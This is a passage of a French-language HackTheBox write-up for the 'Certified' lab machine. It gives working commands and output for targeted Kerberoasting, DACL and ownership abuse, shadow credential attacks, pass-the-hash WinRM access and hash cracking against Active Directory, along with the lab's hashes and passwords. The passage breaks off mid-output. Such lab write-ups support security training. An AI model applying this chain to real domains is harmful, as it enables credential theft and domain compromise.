id="targeted-kerberoasting">Targeted Kerberoasting </h3><p>D&rsquo;après ce qu&rsquo;on observe sur bloodhound, on peut voir que l&rsquo;utilisateur <code>management_svc</code> peut potentiellement être récupéré à l&rsquo;aide d&rsquo;une attaque &ldquo;targeted Kerberoasting&rdquo;. A l&rsquo;aide de l&rsquo;outil <code>targetedKerberoast.py</code>, on effectue l&rsquo;attaque et on récupére le hash du mot de passe de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 -v </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting kerberoast attacks </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Fetching usernames from Active Directory with LDAP </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Printing <span class="nb">hash</span> <span class="k">for</span> <span class="o">(</span>management_svc<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>management_svc<span class="nv">$CERTIFIED</span>.HTB<span class="nv">$certified</span>.htb/management_svc*<span class="nv">$98</span>e6a7443e6760f44cdd6b7a9ff0cdc8<span class="nv">$21</span>d6889b72b0eae33c5f4eb81af29e699b45b48284cde10ae2fdc23a1c929a5f5ccb8c88ef7c9a6f14552b848d42791d0c4f0827621e3fbd06abfb0fe5d41b2754443a76c8abe11350c929d8b6251f927222c0f1c7339620a15866b2f3714d5ab15cdb2893b13daf6db594aa4259d89028198d886c697997cc443afe9f8a09361736573565ebfa264a03c5d00ffb2377898d0c6087385d3b895ecb7e5ae11ac37875409b1bb574350707d049e5aad147b5a36c1172ea4d4deb2f7c62e5bfb75edcbb475e59a34ee8255b9262b39449625a05185526829e7437e9078253741d3bcb130325ad4e07ca41a2436a29020d467f67e4ff16e5be22a04b30317be8dc773f11374aabea10e4e669146698d0c558a060e27ac55554121cc26d7050172044810850793699c631a46cb33af8650b940c3b7676bd397c47cd7b27dd62f15d2b4fe8ca2c741bad98335af2be77ec06317d2ca3e5fb32bad8c3cc599cc2f62fc5a3e1124501ca010fe529d00e87babcaadbb8fb331d9027c999c9d30ad828613f25e782acc721d3842db14020713fcddded15996c195da468a14aa2cf2595f94c305d68d25d91579ec569e226627f15b0b7c5df2fd4306a8b5425e553711f321f3f40d0e9d65bcf77d20db59fea66a66b01ff383af30e7541ace8c20266199fd9ea56a54a5aade2859bd463b386eb754a8eb2c7202b3575adc3e1d8fb9231d93fab04039d4a7f07a9b79ffe00fa9c5c786404c68742e822a84af136cd472f6168621dfa4817312bdc08eb5e070a69842b15bbbea8a503f101043e1981cda2e0df4008c52d41b0e2805d8616c08b025eea8fc230b1b983322be2060f18da2ee9d832769ef53dcbd6d27bed287c55ed73be5678e21f52c4d3703a90d65a340e573648f43bf60a8194975516d2e70b69522f24d4aa713a20ba0d84efa776eb7886113456c77cb1cb535cb741ff651caf111ecec2f8d63a37d544035e2acf72298024415ee49f00037ee3e0a5653643a48675d355c7fd911f728fa3b9933c14919828bc74e689c523c7602a03413105f8c8aee518c6458ad4f2fcdcc8859ebca960a39b37987c7ac6a8d3f0bb8ca06b82f7e3afc3bb0d9777e852fb0a6ccdaf9a7897632d5c1ff7a7524f1ccd06da51b1ffeaeeca9b1b9ef827b7ec9de56af9af28093990983c4bc1543229c1b886b802286d606aca8fd2f1decc07b25f241fdd287975d6db4d32e472ae89700764a5e5a5cefb977ac106431fa8f435bf2c420a00528aaaa9237a286ff433be4ce8eb458cdcab450003ee0c5d49ce6c069cc40c48ed721c3a07b42e470991321b322475f9aef94c3e488b62289793fb3dac6c56cad4ebb95189c8864d2b7425047f5e4fd8f71d029f6e7df1caea05089da8a024bca18c34d92c52cb5d2bc19a4578ec9e872285fccabbdf54cff68968cff90ac592f247928bd27fcbb89b45a75ae00351ca654b9a978c213e52bbca509eeb5c34c520f94c5d394b2dee91988bddb8d7a6e1f61732d961c42ad33b76b46122f2e4a55dce6abf450d64180b6ff2394a59418668bf79f6d34af701fd1e98 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credential-attack">Shadow credential attack </h3><ul> <li>Grant ownership : It has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object. The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. On va donc rendre judith.mader owner du groupe</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 owneredit.py -new-owner <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> -dc-ip 10.10.11.41 -action write <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Current owner information below </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - SID: S-1-5-21-729746778-2675978091-3820388244-512 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - sAMAccountName: Domain Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - distinguishedName: <span class="nv">CN</span><span class="o">=</span>Domain Admins,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> OwnerSid modified successfully! </span></span></code></pre></td></tr></table> </div> </div><p>Puis :</p> <ul> <li>Modifying the rights To abuse ownership of a group object, you may grant yourself the AddMember privilege.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;WriteMembers&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL backed up to dacledit-20241209-130331.bak </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL modified successfully! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Cependant, après verification ca n&#39;a pas fonctionné. Par contre j&#39;ai pu me donner le controle totale a l&#39;aide de cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;FullControl&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Pour vérifier les droits des utilisateur sur un groupe/objet, on peut utiliser cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;read&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> <span class="p">|</span> grep judith -A <span class="m">3</span> -B <span class="m">3</span> </span></span></code></pre></td></tr></table> </div> </div><p>Enfin :</p> <ul> <li>Adding to the group You can now add members to the group. On va donc s&rsquo;ajouter comme membre du groupe : judith.mader.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">net rpc group addmem <span class="s2">&#34;management&#34;</span> <span class="s2">&#34;judith.mader&#34;</span> -U <span class="s2">&#34;certified.htb&#34;</span>/<span class="s2">&#34;judith.mader&#34;</span>%<span class="s2">&#34;judith09&#34;</span> -S <span class="s2">&#34;certified.htb&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Maintenant que judith.mader est membre du groupe, on va enfin pouvoir faire une &lsquo;shadow credential attack&rsquo; pour obtenir le hash NT de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41 -account management_svc -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate generated </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating Key Credential </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Key Credential generated with DeviceID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> </span></span><span class="line"><span class="cl">&lt;KeyCredential structure at 0x7f711d6a6900&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> Owner: <span class="nv">CN</span><span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"> <span class="p">|</span> Version: 0x200 </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyID: KcbU1P0bMaVuWjpricPI4cNFK5+qjRkV4gYbM4DfPP0<span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyHash: 64a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d </span></span><span class="line"><span class="cl"> <span class="p">|</span> RawKeyMaterial: &lt;dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f711d6a68a0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Exponent <span class="o">(</span>E<span class="o">)</span>: <span class="m">65537</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Modulus <span class="o">(</span>N<span class="o">)</span>: 0x920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e69 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime1 <span class="o">(</span>P<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime2 <span class="o">(</span>Q<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> Usage: KeyUsage.NGC </span></span><span class="line"><span class="cl"> <span class="p">|</span> LegacyUsage: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> Source: KeySource.AD </span></span><span class="line"><span class="cl"> <span class="p">|</span> DeviceId: 8438746f-c951-b3d9-9be0-c455cedf6731 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CustomKeyInfo: &lt;CustomKeyInformation at 0x7f711d6968f0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Version: <span class="m">1</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Flags: KeyFlags.NONE </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> VolumeType: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> SupportsNotification: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> FekKeyVersion: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Strength: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Reserved: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> EncodedExtendedCKI: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> LastLogonTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CreationTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Key Credential: B:828:0002000020000129c6d4d4fd1b31a56e5a3a6b89c3c8e1c3452b9faa8d1915e2061b3380df3cfd20000264a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d1b0103525341310008000003000000000100000000000000000000010001920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e6901000401010005001000066f74388451c9d9b39be0c455cedf67310200070100080008fb78af51bb4adb01080009fb78af51bb4adb01:CN<span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Adding Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully added Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Authenticating as <span class="s1">&#39;management_svc&#39;</span> with the certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: management_svc@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;management_svc.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Restoring the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span>: a091c1832bcdd4677c28b5a6a1295584 </span></span></code></pre></td></tr></table> </div> </div><p>On obtient le hachage NT pour l&rsquo;utilisateur management_svc !</p> <h3 id="winrm-connexion-avec-le-hachage-nt-pass-the-hash---user-flag">WinRm connexion avec le hachage NT (Pass-The-Hash) - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">423f.....d084 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credentials-attack--management_svc---ca_operator">Shadow Credentials attack : management_svc -&gt; ca_operator </h3><p>On effectue à nouveau une shadow credential attack pour récupérer le hachage NT de l&rsquo;utilisateur <code>ca_operator</code>. Pour cela on utilise l&rsquo;utilisateur management_svc avec son hachage NT (option <code>-hashes</code> au lieu du mot de passe qu&rsquo;on ne connait <code>-p</code>) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -account ca_operator -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span>: 13b29964cc2480b4ef454c59562e675c </span></span></code></pre></td></tr></table> </div> </div><p>### Nouveau bloodhound avec l&rsquo;utilisateur ca_operator</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;ca_operator&#39;</span> -p <span class="s1">&#39;P@ssword&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span></code></pre></td></tr></table> </div> </div><h3 id="bruteforce-hashcat-du-hachage-nt">Bruteforce hashcat du hachage NT </h3><p>On obtient le mot de passe de l&rsquo;utilisateur <code>ca_operator</code> grâce à hashcat et la wordlist <code>rockyou.txt</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">1000</span> -a <span class="m">0</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">13b29964cc2480b4ef454c59562e675c:P@ssword </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="bloodhound-pe-path">Bloodhound PE Path </h3><p><img src="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1.png" width="884" height="646" srcset="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_b419142d57acff50.png 480w, https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_3d86e4be04c7c92a.png 1024w" loading="lazy" alt="AD" class="gallery-image" data-flex-grow="136" data-flex-basis="328px" ></p> <h3 id="checking-vuln-in-certificates--templates-with-ca_operator">Checking vuln in certificates / templates with ca_operator </h3><p>On observe que management_svc à le droit CanPSRemote sur la machine DC01 :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad find -vulnerable -stdout -u ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327:94994b74f29662fc4d702f2f3b0df327 -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Adding Domain Computers to list of current user<span class="s1">&#39;s SIDs </span></span></span><span class="line"><span class="cl"><span class="s1">[+] List of current user&#39;</span>s SIDs: </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Users <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-513<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>uthenticated Users <span class="o">(</span>CERTIFIED.HTB-S-1-5-11<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Computers <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-515<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>veryone <span class="o">(</span>CERTIFIED.HTB-S-1-1-0<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\o</span>perator ca <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-1106<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\U</span>sers <span class="o">(</span>CERTIFIED.HTB-S-1-5-32-545<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 